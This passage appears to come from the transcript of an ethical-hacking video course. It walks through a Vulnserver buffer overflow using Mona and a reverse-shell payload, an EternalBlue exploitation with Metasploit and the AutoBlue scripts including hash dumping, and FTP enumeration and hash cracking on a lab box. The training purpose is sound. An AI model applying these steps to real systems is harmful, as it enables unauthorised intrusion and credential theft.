characters. Let's just take a look at this script first. Now, this is how we have our bad characters. Again, all we have to do is add the bad characters in, add that to the end of our shellcode, have our shellcode here for the payload command. This is all the same, payload encode, ship it off, we're good. But I want to ship this off, but I want to show you something first. Okay, so let's go ahead and I'm going to switch over to a Windows VM that I have. I'm going to go ahead and load up Vuln Server, and I want to show you a couple commands. So the first command, we're going to use Mona here, and we're going to set a configuration working folder. So what I've done is I've gone in here, and if I went to my C drive and I just created a folder called Mona right here. So go ahead and just create a folder if you want. And what I do now is I declare this is where I want Mona to save data. So I'm just going to say exclamation Mona config, and then we're going to tell it to set a working folder just like this, and then C Mona like this. Okay, you can hit enter on that and it'll say that you have set the working folder. Now, once you have your working folder set, what we're going to do is we're going to go ahead and generate a bad characters list. Remember, we had to go out and find that bad characters list. It's not that difficult, but this is a nice little feature that we can do. So I want to show this to you. We can use a Mona command. So we can just say Mona, and we can come in here and just say byte array, bytearray, and then we type in -cpb, and then we're going to say x00. So what we're doing here is we're generating a payload list for us. And we're saying, go ahead and strip out the x00. We don't need that. You could, in theory, just delete this and just run Mona byte array. But here, this is fine because it'll take out the 00 for us. We don't need it. You can see that it generated a list right here. But if you go to your Mona folder, it put it into a nice text file here. I'm actually going to delete this and let this all go one more time. So I'm going to let it start off as if we were doing this together. Okay, so this text file here, this byte array, you come in here and look, it's got the byte array generated for you. You can literally just copy and paste this into your shellcode. You don't have to go out and do anything. This will generate it for you. So if you had bad characters you wanted to strip off, say like a 01, 02, it would take that and automatically do that for you. Very nice little feature. It also creates this bin file, okay? So it knows the characters it's going to be comparing against and looking for. So once we go and we run this, I'm going to go ahead and click the C up here. That's going to bring us back to our normal view. I'm going to go ahead and hit play up here. I'm going to let the program run. And then what I want to do on my side is, and you can run your Python 2 script if you don't have a Python 3 put together yet. But what I'm going to do is I'm going to run this for.py. I'm going to run the bad characters like we would before. So I'm just going to run Python 3 for.py. I'm going to send that off. And hopefully we should have an error over here. We do. We've paused. You can see we got the access violation. We overwrote with the 4.2s. That's pretty common. This right here is where we would right click and we would say follow and dump. And we go manually review everything. Oh, that's terrible. Instead of doing that, why can't we just use Mona? Well, we actually can. So that's exactly what we're going to do. So here we're going to say Mona. I'm going to delete some of this. And we're just going to type in compare, Mona compare. And we give a -F for the file location. And so we're just going to say C, Mona, and then we're going to compare this bin file that it generated, byte array.bin. So it generated this byte array bin file right here. It's going to compare that, and it's going to look at the address we give it. So we want to give it the address of the ESP sitting here. So we have, in the ESP, we have 010A F9 C8. And this changes. Your ESP value might be different. That's fine. So just enter in whatever you see in your ESP. And I'm going to go ahead here and I'm going to just hit enter on this. And it's going to look for any bad characters. And it says here that the bad character results are 00 and 80. Now, when we manually reviewed this, we didn't see 80 as being a bad character. It says possible bad characters 80. If you see this and you want to generate your shellcode without 00 and without 80, that'd be perfectly fine. You don't have to go through and utilize 80. It will generate shellcode without it, and just to be safe. Okay, but here, I don't say it's false positive. It's just detecting a possible bad character. So you would take this list here and just go ahead and generate your shellcode based on that. So again, fairly straightforward. Now, next step. Remember, we had to find the jump address. We had to find our return address. And we went and we found the XFF, XE4, and we had to do that in more of a convoluted way using Kali Linux. We don't have to do that here. We can actually utilize a Mona command as well to do all this. So I'm just going to make this clean again. And let's actually just go ahead and open up a new immunity debugger, and we'll just go ahead and load and attach Vuln server again so that we have a clean instance. We can let this run. And remember, when we were searching for our essfunc.dll, we tried to find the right module. When we came in here and we said, hey, Mona modules, and we looked and we saw the essfunc.dll and we said, hey, that's good. And we went and found the XFF XE4. Well, we can kind of bypass a step here. Let's say that we identified a module like we did. Now all we have to do is we can just say, hey, I want to find the jump address for ESP. Okay, and then we just say, I want to find that for essfunc.dll. And we're going to do that, and we should find a return address when we run that. So it'll bring you to this screen. All you have to do is minimize this. And if you come into here, you'll see that we ran the command. And we have the same results as we did before. So we don't have to go through that whole process of finding the XFF-XE4. This will do it for us. And you can see the 625011AF, that is identical to what we had before. So we found the exact same thing. Okay, I'm going to close this out. And I don't think we're going to need this anymore. So I'm going to go back to our Linux and I want to look at the last script that we run. Okay, so this is where things get a tad bit different, and I wanted to show you the manual byte encoding here. Sometimes the payload encode does not work the proper way we want it to. I was running into issues with this running this script. So the other thing that we can do is manually byte encode this. And so what I've done is I've generated our payload. This is the same thing as running MSF Venom. Ran through this, got our reverse shell ready. And I've just put B's in front of every single line. This is telling it we're going to byte encode this. Okay, and come down here, look at the shell code. There's a B in front of the A. There's a B in front of the return address. There's a B in front of the NOP, or the no operation. And then we've got the overflow, which is already byte encoded here. We're going to send that over. Same thing. This time we're going to just say payload, put a B in front of the trun command. And then we're going to send over payload without the encoding. And hopefully everything will work just fine. I'm going to go ahead and execute this script here. So I'm going to open up a new tab and I'm just going to set a listener on all fours. And then I'm going to just open Vuln server here on its own. And we shall test this and see if it works. So let's go ahead and run Python 3. This is my 5.py. Execute that. Hopefully we have a shell here, and we do. Same process. Again, not much changes throughout this whole thing. I kind of sped ran through this, and it's more or less because I know you already have the foundations down. Now it's just changing this to the modern times and changing this to show you some of the easier tips and tricks. So when you're looking through these, just go ahead and note Python 3, note the subtle differences of having to encode and having to have a separate variable down here. And then the subtle differences of using parentheses for your print commands as well. Everything else, for the most part, stays the same. There are differences between Python 3 and Python 2 that are more significant than this, but in terms of our scripting and what we have to do, not very significant for this aspect. So again, note the payload encoding. If you're running into any issues with Python 3, putting a B in front of your payload is a good practice, good idea. So all right, that is it for this video. I will catch you over in the next section. Welcome to the course capstone. This is the 2021 edition of the course capstone, and we'll get into the old capstone, the new capstone, and what the differences are. But the course capstone is meant to challenge you and test your skills and knowledge up to what you've learned so far. Now, not everything is cut and dry. These boxes are not meant to be particularly easy. They're actually meant to be learning experiences. So what that means is you are welcome to go through these machines on your own, give them a try. I realize that we have not talked whatsoever about privilege escalation. We have not talked about a lot of the tools that you're going to see, and this is by design. Hacking is not going to be able to show you, a course on hacking is not going to be able to show you everything, but you're going to get to pick up some ideas and a little bit of Googling and a little bit of frustration and really just getting in there, getting your hands dirty and seeing what you can come up with. So I encourage you to try these on your own in the order that they're listed. However, if you want to just watch and follow along, that's absolutely okay as well. Now, I mentioned privilege escalation, but we'll talk about that here in a second. I want to show you the old course capstone and where the new course capstone is. So I have uploaded the new course capstone. This is not all the machines yet. This is just the ones that I started uploading. All you gotta do is go in here and download these machines. You can run them with VMware or VirtualBox. I've got setup instructions for a couple of the machines. Once you've seen one Windows or one Linux, you can see them all and how to download them and run them. So that's pretty straightforward. The link will be provided in the resources or below the video, depending on what platform you're on. Now, the old capstone. Here's the old capstone. I have not pushed the new update yet, so this is what the old capstone looks like. you could see there were 10 boxes, there were 5 hours of material, or was 5 hours of material. The issue with the old capstone was that we were relying on a platform called Hack the Box. Hack the Box was a paid subscription platform. It cost anywhere from $10 to $15 a month. I'm not sure exactly of the true cost, but I realize not everybody can pay additional funds to go and use this platform to walk through these machines. So what we have done is we have made these machines available via YouTube. So I'm going to put this down below as well, but there is a series originally released called Pentesting for Noobs. If you look, all 10 of those machines are going to be here as well. So you're welcome to come to the YouTube channel and watch these videos. If you want extra content, extra walkthroughs, and more of the practice and more of the capstone, you're welcome to go sign up for Hack the Box, do all that. But we are removing that dependency from the course. Now, these machines are going to require what is called privilege escalation. We are going to walk through privilege escalation. What I mean by that is, I mean that we are looking at a box. When we land on the machine, we are not root, or we are not system on that machine. We are a low-level user, we have low privileges, and we need to escalate our privileges to the highest level that we can. So all of these machines, except for one at the time of this recording, are going to have some sort of privilege escalation involved. Now you're going to get to see some cool tooling, some different techniques and tactics, but it's not going to go into super depth on this. There are courses out there that we have created. We have 2 here. The Windows privilege escalation for beginners and Linux privilege escalation for beginners if you are on Udemy. If you are on the Academy, same concept, Windows and Linux, just depending on the platform you're on and which one you prefer. So if you're interested in going after any sort of certifications, if you're interested in doing any sort of capture the flag or getting better at just escalation in general, highly recommend these courses. If you're looking to stay kind of on that practical path, then these aren't really necessary. It's really based on chasing certifications in the hacking realm, like your OSCP or some of the other certifications that might be out there. They use a lot of privilege escalation to test on. But again, it's not really on the practical side of things. So depending on what your motivations are and reasoning, however, we are going to show them in this course only because they are a good introduction to hacking. It's good to see the other side. It's good to see some of the exploits that are out there, some of the thought processes that are out there. And then once we get into the Active Directory section, it'll really take off from a practical standpoint, and we're really going to start hacking like we are hacking a real network, and it's going to get really fun. It's my favorite section in the whole course. So with that being said, go through the courses again in order as you see them. So however you see them in the list, go ahead and go through them. We're going to add more courses over time. As of right now, the dependency is that you download these and install these for your lab. Again, there will be instructions for those. In later attempts, we are hoping to offload these to an online lab. Unfortunately, we won't be able to do that with Udemy, but with the Academy platform, we should be able to do that. So we're working on getting that. But for now, the Google Drive link that you see attached to the introduction video, this video, will have all the files that you need to download in order to complete this section. So with that being said, go ahead and complete the next box. I'll see you in the next video, and hopefully you rooted it. So before we begin the capstone, I want to show you how to import a machine. And I'm going to show you, starting with Blue, how to import Blue, which is a Windows machine. And then we're going to go ahead and import a Linux machine in a later video. So that way you should know how to do both, though the process is exactly the same. So for Blue, what we're going to do is we're going to come into VMware here, and I'm going to show you VirtualBox as well. We're going to go Open Virtual Machine, and you're just going to select the file that should be available to you here, which is Blue. I've already done that through the magic of editing, so it's already here, and I'm just going to go up here and show you that. We'll get to settings here in a second. For VirtualBox, same exact process. I'm going to go ahead and just go to Import. I'm just going to paste the location in here. You can also use this to go find your file. And I'm going to hit Next and Import. Okay, and it should start importing this file. So here we go, it's importing. It'll take 50 seconds. That's fine. Gives me time to talk about the settings. So you can see here that we are in bridged mode. Okay, we don't want to be in bridge mode. Let's go ahead and edit this. go to bridged, and we're going to turn this into actually just NAT. Now you can choose how much memory you want to use here. Mine's set to 4 gigs. That's fine. I've got a lot of RAM. If you do not, then go ahead and maybe turn this down to 2 gigs would be absolutely fine. Okay, so I'm going to hit OK here. Now I'm going to power on this virtual machine, and then we're going to wait for the other one to finish importing, which it has. So here, while we're waiting on this, go ahead and go to settings, and you're going to want to do the same thing. So network. No bridge, don't do bridge. We're going to do NAT, okay? And then we're going to just enable the network adapter here. So you should have your NAT network set up. Remember that when you did that originally with our settings. If you need to, you can go back to tools, you can go to preferences, come in your network, make sure your NAT network is set up. Anyway, come in here, you can go to your settings, and again, make sure that this is on NAT. So, or NAT network, I apologize. NAT network right here, okay? And then I'm gonna hit okay. And then all you need to do is power this on. I'm gonna show you with the virtual or the VMware, it's gonna be the same process. Now, you can log in as the administrator. You're gonna get credentials for every box. That is for the sole purpose that you can access the IP configuration and find the IP of this machine. Okay, just to make it a little bit easier. So, there will be an accounts file in here, and here you can see the administrator password is password456 exclamation. So we're just going to do that, and we're going to make sure that this box is online and that we can communicate. So I'm going to quickly go to command, and you can install VMware tools if you want, make this pretty, all that jazz. I'm not going to do that here. I'm just going to quickly figure out what's what. You can see 192.168.138.135. I'm going to come over to Kali Linux. I've got a scan that we did for 134 up, but that's okay. I'm just going to ping 192.168.138.135. Okay, and you can see I'm getting a response back. And that's it. You need to make sure that you can communicate with your machine. So if you're running VirtualBox, make sure you spin it up, you log in, you figure out what it is that your IP address is, and go from there. Very, very straightforward. So that is it for this video. Go ahead and attempt to attack Blue. See if you can figure out what the deal is and where you can go and how you can exploit it. And meet me in the next video once you've attempted it to see if you were able to successfully root or system this machine. Thank you. So let's start by taking a look at our Nmap scan. Now, the IP address I got was 192.168.138.135, and not a lot of ports came back. So we got 445 back, and we can scroll through, get a little bit of information, like we see a NetBIOS name on this machine. We see that it's running Windows 7 Ultimate 7601 Service Pack 1. Doesn't appear to be part of a domain, just a work group. Same thing, work group, authentication level user. And really there's nothing here that is a big indication as to what this could be. So when we have this, as we discussed before, when we're looking at SMB specific vulnerabilities, because that would be my guess here, would be the vulnerability would be SMB related. We need to enumerate SMB in one of two ways, really. The first of that being, well, can we search based on version information that we see here? Can we search on this and see if there's anything vulnerable that could be there? Second of all, if we can't find anything right off the bat for this, maybe then we can go and use something like SMB client, do some enumeration. Maybe there's a null session we can connect to. Maybe there's a file or something, some sort of information with a username or password or something along those lines that gets us into this machine. Otherwise, we're pretty much stuck with version information. Okay, so we're going to go ahead and just copy this. And there's a reason that this is the first machine in our run through of the capstone, because this is the easiest, or should be the easiest. So we're going to go ahead and go out to Firefox. And I'm just going to go google.com, come in here, we're going to search for this, and we're going to search for exploit. It already knows me. And we can look through some of these and see if there's anything here that really stands out. First thing for me, we've got a few. We got one here, one here. These just kind of say they don't necessarily say what they are, so we might need to click into them. MS17010 keeps popping up quite a bit. Let's see if it tells us anything here about architecture. Really doesn't, just shows up as this. So we'll have to do some reading into this. This is a local privilege escalation. Doesn't really help us because we're not doing privilege escalation at this point. We're just looking to see if we can even get on this machine. Okay, this shows us, hey, MS17010. This is a exploit for it written in Python, it looks like. And it says, hey, okay, this could be our target. So we're going to take two different paths here. We're going to look at it first in Metasploit, and then we're going to take it from a manual path, and we're going to see if this is indeed what we're after. So let's go ahead and just go to MSF console. And yours might look a little bit different than mine depending on what version of Kali you're on, but the process should be the same. I'm on MSF 5. So we're going to go ahead and just search Eternal Blue. And I do know recently they combined all the Eternal Blues into one. So again, yours might be a little bit different than mine, but it should be the same process or concept. Now, the first thing we want to do is we want to look up this SMB scanner, right? We want to do an auxiliary. Our auxiliary modules are going to tell us what is there. It's going to be a check. It's not going to be so much an attack. It's more of scanning than anything else. There are some attacks in auxiliary modules, but they're not full on exploitation. So let's go ahead and just say use one, and we're going to go options in here. And all it's going to do for us is it's going to come in here. We're going to provide it with an R host. We're going to run it, and it's going to provide a check. Okay, so we can just say set R host to 192.168.138.135, whatever your IP address is. And then I'm going to say run. And it says host is likely vulnerable to MS17010. Okay, there's a second way to do this. So let's go ahead and just search Eternal Blue again. You can also search MS17-010 or however you want to do this. It should all show up. I'm going to use this number 3 here, the Eternal Blue one. We do know that we're on Windows 7, so the Windows 8 won't work for us. And PS exec we could run, but I'm going to go ahead and just use the one that is most popular and works usually out of the box. So I'm going to go ahead and just say use 3 and type in options. And in here, we have a verify option, which means we should have a check option here. So I'm going to again just say set rhost. I'm going to show you the check feature. 138.135. Okay. And then I'm going to say check. All right, and so check did exactly what the auxiliary module did for us. It says, hey, it's vulnerable. Okay, or likely vulnerable. So what we need to do is we need to set a payload here. Now, something that you might not know yet at this point is that payloads are, by default, they are set to 32-bit, at least in this example, because there could be a 32-bit exploit in here. Actually, this says 64-bit, so I could be lying to you. Some payloads are set to a 32-bit to start. Because we know that this is a 64-bit machine, or at least should be, given that it's enterprise, we're going to go ahead and set this to 64 bits just to be safe. So this is a practice that I take on if I know the architecture of the machine. I'm going to go in here and set my payload for myself. Now, this should be 64-bit, but just to be safe, we're going to type in Windows and hit Tab. Because it only autocompletes to 64-bit, this is perfect. Now, I think where my mind was going is that I want this to be a Meterpreter shell, and I don't know if it defaults to Meterpreter. It might default to a reverse TCP of some sort. So we're going to go ahead and use a Meterpreter shell because we want a nice interface to have. So I'm going to go ahead and set that options one time, and I'm going to look at the L host here, and we could just say set L host over to, we could just call it ETH0, or you could set your IP address in here. Again, you can IPA or ifconfig, and whatever your IP address is, I'm running on ETH0, so whatever you choose, you could place here as well. So I'm going to go ahead and run this. Now, while this runs, this might not work on the first go. It might not work on the first few goes. This is going to try going through what are called different sets of grooms on here. And it looks like it worked right away. But sometimes this doesn't work right away. And if yours doesn't work right away, that's okay. It might take a few attempts through this first process, and you might have to hit run a few times for this to go. Now, I have chosen using blue or eternal blue for this course because it's so relevant. This is a 4-year-old exploit now, and I see it on so many internal penetration tests. It's not even funny. Like, I wish it would just go away, but it is this easy to run and just get on a machine and gain access. And it's incredibly easy and incredibly prominent in environments. Think about environments where they have systems running that they can't update or do anything with, and you have this, or they just have poor patch management and you have this. It's so easy to get on a machine, and then you come in here and you say hash dump, and you dump out the hash. And now we've got administrator hash. We can go try to crack that. We can do pass the hash, which we're not there yet. We're going to get there in the Active Directory section. You're going to see what the differences are on this kind of stuff. But you can utilize these hashes to our advantage, and we're going to play around with that a little bit later in the course. So with that being said, this is something that you will likely see if you do become a pen tester. You'll see this in an environment, and it is really this easy to get into a machine like this. So we have used this now to come through here and gain access. We're going to go ahead and go back, and we're going to try doing it again, but we're going to do it through manual method. So I'm going to open up a new tab. All right, and we're going to come in here, and I'm going to search Google. Now, if we want to go look for manual methods of exploiting a system, we're likely going to use GitHub, perhaps exploit database. Now, this exploit database one, I'm not going to use only because it gets a little tricky with eternal blue. There's a few things that we have to do. I don't believe this one is just one that runs right out of the box. It has a little bit more information here than what's leading on. Now, we might need to reboot this machine, by the way. We'll give it a go and see if it works. It might not work out of the box because we've already exploited the system, but we'll try it anyway. So what we might want to do is something like eternal blue, and we might want to say GitHub. Okay, and we can come through here and look through different ones. I like to open a few, and I like to look at them and read the amount of stars that they have, read the descriptions that they have, detailed walkthroughs. You know, all of these have decent stars. This one doesn't have a great walkthrough. This one has a very good kind of detailed walkthrough, has video tutorials, has a decent amount of stars, and I honestly like it. So we're going to go ahead and just get the auto blue one from Endgame. So go ahead and find that and get to this. We're going to go ahead and copy this code. And there have been commits since 2021. So that's great. There's recent commits to this, which is awesome. So I'm going to go ahead and go into, I'm going to cd into opt, and I'm going to git clone this. And that's not what I should have been copying. Should have copied this, but we'll try it one more time. And paste here. All right. And then I'm going to cd into auto blue, and it gave instructions in here somewhere about how to install this. So let's go to installation, pip install requirements for Python 3, which we should be on at this point. So we're going to do pip install -r requirements, just like that. Let that install. Looks like everything is satisfied or installed, so that's good. From here, we're going to go ahead and do the usage. Now, there was a checker in here, so we can run Python with the checker. So I don't know, it says Python 2, so let's go ahead and run Python 2 with it. It could be Python 3 too, so we might run into an issue. Checker.py 192.168.138.135. Target is not patched. Testing name pipes. Okay, so this is something that I actually use on an assessment, regardless if it's this or the Metasploit version. I will take a screenshot of this. There are reasons sometimes where we won't run the exploit. If the environment has critical machines running, for example, like in a hospital, I might not run this exploit because this can take down a machine. And if I don't know what machine I'm taking down, who knows in a hospital, right? You don't want to make that mistake. So it's always better to play it on the safe side when we're running these exploits. If you don't know, you can always ask your client, say, hey, I've got this machine, here's the IP address, I want to run this exploit, is that okay? And get permission first. Now, there's a lot of ways, which you'll see when we get into the Active Directory exploitation part of the course, that we can compromise a domain and we can run all kinds of exploitation, own the whole domain controller, and not worry about tipping over the server by any means. This can tip over a server, so you want to be safe with these kinds of things. So with that said, I'm going to show you how to run this manually, but it's going to tip your box over. I'm going to give the secret away. It's going to tip your box over, and this is going to be the lesson learned from running this exploit. I'm going to show you the proper way to do it manually. With the version we have, it's not super easy to get a shell from the manual method. We could go around and play around and find one that works, but I'm going to show you this from here's how you would run it manually, but also here's the dangers of running this in an environment. And this is a perfect box to show you why we don't go run remote code execution on machines in an environment, because this can take down a machine. So let's go ahead and run through the process. I'm going to show you the process, and then we're going to knock this machine over. So first thing we're going to do is we're going to cd to the shellcode directory, and we're going to run shell prep. And I'll say this now and watch the exploit will work fine. So, oops, we're going to go ahead and just hit yes here. And then we're going to enter in our reverse connection, 192.168.138.128 is mine. I'm going to say 9999 for this. We can do 2222 for x86. We're not going to use it. Now we have the opportunity to use a interpreter shell or generate a regular command shell. If we do the interpreter shell, we can go into interpreter and we can actually run it in the sense that we use a multi-handler and pull down. It's basically a listener. It is a listener, and it's going to pull down a interpreter shell for it. So it's just a shell code that we're generating. We already used a interpreter shell to get the first shell on this. So now we're going to go back and we're going to go ahead and try to do this with a regular command shell. So you can press 0 if you want to try the interpreter shell method. You can also press 1 to generate the regular command shell method. We're going to go ahead and just do the regular command shell. We're going to generate a staged payload. Staged or stageless here should crash this machine. The other thing we're going to do is we're going to run this listener prep once this is all done. So it's doing this for us. We're going to go ahead and cd back in a second once this is done. All right, now I'm going to cd back and we're going to do listener prep. And this is going to run a listener in Metasploit for us, which is nice. We could just as easily run this with netcat. We can just say nc-nvlp like we have before, nc-nvlp like this, and whatever port we're listening on, all 9s before. So we're going to go ahead and just let this run its course as intended. And we're going to do 9999. We did 2222 here. And we're going to go ahead and say regular command shell, all the same things we did before, staged payload. And it's going to start this up for us, hopefully start up some listeners, and you should see a lot of work just go in. Okay, it's got all those listening. It's waiting for any sort of connection to come through. So the next thing we're going to do is, and it is using the multi-handler for us already, it's just using a shell reverse TCP instead of a interpreter reverse TCP here. So last thing we're going to do is run the exploit. So we're just going to say Python eternal blue like this exploit, and we're on 7.py. Our target is 192.168.138.135. Path to shellcode is just shellcode and then scall.bin. And we do not have to provide a number of groom connections. That's optional. We're going to run this and we'll cross our fingers. You never know. Might work. Doesn't look like it's working. We blue screen the machine. So this is a perfect example of why you just don't willy-nilly run this in an environment, okay? So a good lesson learned, honestly, because if you're in a critical environment, you have no idea what that machine does. Imagine if this was something in a hospital controlling equipment that was being used during surgery. Who knows? If you took that down, it could be very, very, very bad. So it's good to see the other side of it. Again, get permission before running something like this, unless you know that your environment's safe. It's okay to take down some machines, etc. But usually that's not the case. So with that, we're going to go ahead and move on to the next machine. Hopefully you got this and got through the walkthrough just fine. So I'll see you in the next machine as we walk through that and hopefully take down another box. Okay, in this video, I'm going to show you how to quickly open up the Academy machine in both VMware and VirtualBox and how to set it up. After this, you should have seen a Linux setup and a Windows setup, so you should have no more issues setting these up. I have full faith in you beyond this, so repeat the process. If you need to go back and watch the video, just come back and watch one of these. Anyways, we're going to open a virtual machine. If you are in VMware, I'm going to go into my folder that has it, Capstone, and I'm going to go to Academy and just double click, open that up. It's going to ask me where I want to put it. I'm going to go default settings. You can choose wherever you want. I'm just going to hit import. It's going to take a minute to import. While that's happening, I'm going to show you, and you might see a retry. Just go ahead and hit retry on that. It should work. While we're waiting, I'm going to go ahead and show you the other side of things, which is VirtualBox. Go ahead and hit File. Go ahead and hit Import Appliance. And then just go select your file. I've got it for copy paste purposes. It's a lot easier. And VMware thinks it can just take over. It's wrong. So in here, make sure you just have your OVF file that you downloaded. Hit next. And then come in here and you're going to see these settings. You can go ahead and just run the default settings for now and just import. We'll change the settings once we have it imported. So go ahead and import that. On VMware, we're just going to ping pong back and forth real quick. Under the settings for the Academy, go ahead and just hit Edit Virtual Machine Settings. In here, this is a Linux machine, so 1 GB of memory is fine. We don't need a lot. Come to your network adapter and make sure that it says NAT and not bridged. Hit OK. Go ahead and log in. Now you can power on this virtual machine, get that going. In the next video, I'm going to show you the password, which is just root TCM. Same thing here on the Academy. Go ahead and go to Settings. We're going to go to Network. Make sure your NAT network is selected. Remember, we created a NAT network. Make sure your NAT network is selected and that you are on the same network as your Kali Linux machine, or you will not be able to communicate with it. So with that out of the way, you can go ahead and power this on, depending which one you're on. Catch me in the next video when we will talk about logging in, finding the IP address, and getting started with attacking this machine. I'll catch you over in the next video. All right, on to the next machine. This one is called Academy, and this was created by Alec, specially for us. Now, we're going to attack this machine, and we're going to get a low-level user. We're going to pivot into a second low-level user, and then we're going to root this machine. If you did not root this machine, do not stress about it. These boxes are meant to be hard if you are a beginner, and you are meant to walk through with us and see all these different techniques, tips, and tricks, and just the idea and mindset as well. So do not stress if you are having issues trying this on your own. That's 100% okay. So I have imported the machine. You should be familiar with this. At this point, all I'm going to show you is how to log into the machine, similar to what we did with the Windows box. Now the password here, the username is root, the password is TCM. Tango Charlie Mike. Okay, we come in, we're going to run DH client, hit enter. Okay, mine says file exists. That's because I already ran this. You go ahead and run it. It should take a second to load. Once that loads, go ahead and type IPA, and you should get an IP address back. Okay, mine says 192.168.138.129. Yours might say something incredibly different. But go ahead and go with whatever the IP address says here, because that's what you're going to use. Now, with that out of the way, I went ahead through the magic of editing and ran a Nmap scan. You're welcome to do this as well. -A, -P, -T4, IP address. Nothing new at this point, okay? What came back for us was a few different things here. We have port 21 open, and we have a VSFTPD, say that 3 times fast, 3.0.3, and it says anonymous FTP login is allowed. Okay, it says, hey, there's a note.txt in here. Okay, that could be interesting. Now keep in mind, everything that we're doing in these machines is going to be very gamified, very CTF, or capture the flag, and that's exactly what we're doing, is we're capturing the flag. So don't stress about this being incredibly realistic at this point. We're going to get into the more practical stuff as we get into the Active Directory pen testing section. We're really just trying to focus on some of the basic concepts and some of the things that you'll see if you go do any CTF events or you go on to any other certifications or anything like that. So this is a good introduction, kind of jump into the pool, maybe get your feet wet first into hacking. So with this in mind, we've got port 21, we've got port 22, we've got port 80. Now, 80 is a web server, 22 is SSH. My strategy here, when I see port 22, I immediately erase it off the board. Now, that's not to say that it couldn't have an option of attack here. You could brute force it. You could go in there and try like a root username, or if you knew other usernames, you can go in there and just try to brute force the password, and maybe you get lucky and log in. Usually on CTFs, that is not the intended route. Now, for things like, say, example, a pen test, you might want to brute force SSH because there's a couple reasons. One is there a weak password? Can I log in with a root user on a weak password for this machine? If so, that's bad. You tell your client, hey, this is bad. You're using weak passwords. Number two, you want to see if your client can pick you up, meaning, do they detect you when you are running brute force scans? If you have 500 attempts against an SSH login and you're still able to go attempt after attempt and nothing has been detected, you have not been prevented on that network, then that's an issue. You should probably bring that up to the client and say, hey, I ran a brute force against this login and you didn't detect me, you didn't see me do anything. We'll talk about that more in the report writing section and some of the things we talk about detection wise, but that's another example of something you want to test for and see if you're detected. You're testing detection throughout an entire pen test. So you want to say, hey, did you see me scanning? Did you see me brute forcing? Did you see me running exploits? Did your antivirus pick me up? Where was I caught during this pen test and where can you improve? So something about SSH, a little tangent there. But with that out of the way, port 21's open, port 80's open. Now we see down here that it says, hey, we're getting an it works page, which means that it's just a default Apache 2 web server. We can go out to this web server and just take a look, 192.168.138.129. You can see this is just a basic, hey, it works Apache 2 Debian page. That tells me that we're likely running on PHP on the back end, though that doesn't mean that entirely. This is just kind of an indicator when we see Apache, I'm assuming PHP on the back end. So let's go back here. Now, we could do a couple things. We need to identify what's going on behind the scenes because all we're seeing is a default web page. Which, by the way, this is a finding on a pen test. So you would say, hey, this is just revealing too much information. Why do you even have this out there? Is this web server meant to be up? If it is, then take away this default web page and make it, make it say, hey, if you're not supposed to be here, then don't be here. Anything but a default web page, because all we're seeing is architecture here. If it's not supposed to be there, from a hacker's perspective, this means poor hygiene. You're just leaving ports open. You're just throwing computers on the network and on the internet willy-nilly, and this just means that you likely have poor hygiene and we want to look into you further because if this is something you're doing, you might be using bad passwords or not patching, etc., etc. So anyway, off that tangent, going back to the scan, I'm curious to know what the note says. We'll go check that out. We have anonymous login, so we'll start there, and then we're going to go ahead and take a look at the different pages that could be hiding behind the default page. So I'm going to leave this up, and now we're going to go take a look first at the FTP. So in here, I'm going to make this bigger. Okay, so FTP, all you got to do is 192.168.138.129 or whatever your IP address is. And then I like to just type anonymous twice. Okay, we get an anonymous login. We are successful. We can come in here and say ls. All right, and we have a note.txt in here. So all we need to do is type in get note.txt. That's it, and we're pretty much done. So the option here is we have FTP open. Now, there's a possibility that we could utilize this. So we have the ability with FTP to put files and get files. We just got a file. We can come put something on here. The only issue is we don't know where on this machine that this note.txt is stored. If for some reason this note file was stored in like the, I don't know, this Apache server, if we came in here and we just went like /note.txt and we saw it, all right, then that could be of interest because we know the directory that we're in. We could come in here, just upload malware, come up here, execute the malware because we have execution, and then we could get a shell and keep pushing forward. But in this instance, we don't know where it is. There's a good chance it's not even in the web server. If for some reason it was in the web server, we could use that to execute, and that is a strategy that we might see at some point. But here, in this instance, unless I know where this is, the ability to put files in here does nothing for me. In a real world scenario, maybe we can go look at getting social engineering or getting somebody to open a file or something along those lines. But for here, for this capture the flag type style, we are only focused on getting this note, and that's pretty much it. Also, secondary finding on a pen test would be this, because we see Apache 2.4.38. It's telling us it's running a Debian server, which means we're attacking Linux. So if we were doing this blind, didn't know that, now we know. We know the Apache version, we know Debian. We're getting a little bit of information, and we're just compiling that information right now. Debian server, Apache, PHP most likely. Okay. All of this is information gathering. That's all we want to do, is gather as much information as possible. Now let's go ahead and exit out. And I want to just cat out this note.txt. Okay, so it says, hello Heath, Grimmy has set up the test website for the new academy. I told him not to use the same password everywhere. He will change it ASAP. I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command. All right, so we get looks like a database information here with values. Now it says the student regno number is what you use for login. So student regno here, you see this ties up to the first. And then we see student photo, and there's nothing in for the student photo. We see password, then we get password here, student name, okay, pin code going on. So this is pretty sensitive information. If this were on a pen test, which I've actually seen something similar to this. I've been on pen tests where I have seen open FTP servers. I've seen open web directories where they had backups of their entire website on there with database passwords and everything. It is, it's realistic in a sense that you could run into something like this. It would be pretty bad. So anyway, this is coming from our friend J Delta, and we're going to go ahead and just grab this password here. We've got this, we've got this. Now the issue is, this is likely not a password. This is likely a hash. And we can copy this and see first before we go down that route. This might be a password, but we can copy, and let's just take a quick look. We can go, let me cd back out of this here. We can do something like this. We can type in hash identifier like this and just hit enter. Okay, this is built into Kali Linux. You just go ahead and paste selection, hit enter, and this will tell you all the things that it thinks it is. This is saying, hey, most likely it's an MD5 hash. Okay, so we have an MD5 hash. Guess what? We can crack that hash. I'm gonna go ahead and exit out of here with Control C. And if we go to Google and do a quick Google search, so I'll give you time to go do a Google search, but all you have to do is say hashcat, which is the tool we're going to use to crack this password, crack MD5 hash. Here we get a blog that says how to crack MD5 hashes. You go into that, and it says, hey, in order to do that, you need to run hashcat -m for module and 0 with your hashes file, and then a password list like rocku.txt. So we haven't gotten much into hash cracking in this course, and we're going to talk about it a little bit. We'll talk about it a lot more when we get into the actual Active Directory hacking, because we start cracking passwords there, it becomes a lot more important. Here, we're just going to play around with it a little bit. So I'm going to show you this only this one time. I'm going to show you this on a Linux machine. This is running in a virtual machine here. Okay, so we're running hashcat. We're about to run hashcat in a virtual machine. Typically, we do not want to do this because hashcat is going to be running off of our CPU. Okay, it's going to be running off our CPU inside a virtual machine. That's going to make it run a lot slower. Hash cracking runs off of GPUs. Okay, so we're running off of our graphics card, not our CPU. So We want to do that. So when I run hash cracking in the real world, or even later in this course, you're going to see me running it on Windows because that is my base operating system. I will take that, I'll run it off there because it's going to use my GPU. It's going to use my graphics card. And that's what I want. So in this 